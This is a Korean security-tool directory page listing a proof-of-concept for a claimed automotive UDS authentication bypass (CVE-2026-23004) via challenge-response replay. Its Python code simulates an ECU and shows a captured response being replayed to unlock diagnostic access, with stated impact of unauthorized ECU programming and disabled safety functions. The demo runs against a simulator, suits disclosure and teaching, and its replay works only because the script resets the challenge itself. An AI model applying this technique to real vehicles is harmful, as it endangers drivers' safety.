Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-23004-Automotive-UDS-Authentication-Bypass-via-Replay-Attack — 자동차 ECU를 대상으로 챌린지-응답 재전송을 통한 UDS 인증 우회를 시연하는 PoC 익스플로잇과 Python CAN-UDS 시뮬레이터. | Kitploit
도구/GitHubGitHub/george0papasotiriou/cve-2026-23004-automotive-uds-authentication-bypass-via-replay-attack
Authentication & AuthorizationEmbedded Systems SecurityIoT SecurityVulnerability AnalysisExploitationPenetration TestingHardware & IoT Security
GitHubgeorge0papasotiriou/cve-2026-23004-automotive-uds-authentication-bypass-via-replay-attack

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-23004-Automotive-UDS-Authentication-Bypass-via-Replay-Attack

자동차 ECU를 대상으로 챌린지-응답 재전송을 통한 UDS 인증 우회를 시연하는 PoC 익스플로잇과 Python CAN-UDS 시뮬레이터.

저장소 보기
115일 전아직 검토되지 않음

CVE-2026-23004 – 재생 공격을 통한 자동차 UDS 인증 우회

프로그램 코드 (Python CAN‑UDS 시뮬레이터)

root@kitploit:~
# uds_sim.py - ECU that authenticates with a simple challenge
import random, hashlib

class ECU:
    def __init__(self):
        self.secret = b'long_secret_key'
    def generate_challenge(self):
        self.challenge = random.randbytes(8)
        return self.challenge
    def verify_response(self, response):
        expected = hashlib.sha256(self.secret + self.challenge).digest()[:8]
        return response == expected
    def unlock(self):
        print("ECU unlocked! Critical functions accessible.")

# Attacker captures a valid challenge-response pair
ecu = ECU()
challenge = ecu.generate_challenge()
# Legitimate tool computes response (simplified)
response = hashlib.sha256(ecu.secret + challenge).digest()[:8]
ecu.verify_response(response)  # first unlock

# Replay the same challenge-response
ecu.challenge = challenge
ecu.verify_response(response)  # second unlock without new challenge - works
ecu.unlock()

CVE-2026-23004 – 재생 공격을 통한 자동차 UDS 인증 우회

Severity: High

개요

자동차 ECU는 UDS(Unified Diagnostic Services) 보안 액세스(서비스 0x27)를 구현하지만 일회용 챌린지 사용을 강제하지 않습니다. 공격자는 유효한 챌린지-응답 쌍을 캡처하여 이를 재생함으로써 인증을 우회할 수 있습니다.

취약점 세부 정보

  • 유형: 재생 공격(Replay Attack)
  • 영향: 비인가 ECU 프로그래밍, 안전 기능 무력화.
  • 근본 원인: ECU는 현재 챌린지와 일치하는 모든 응답을 수락하지만, 동일한 챌린지는 무효화 없이 재사용될 수 있습니다.

익스플로잇 데모

시뮬레이션 실행:

root@kitploit:~
python uds_sim.py

ECU는 동일한 인증 쌍으로 두 번 잠금 해제됩니다.

도구 다운로드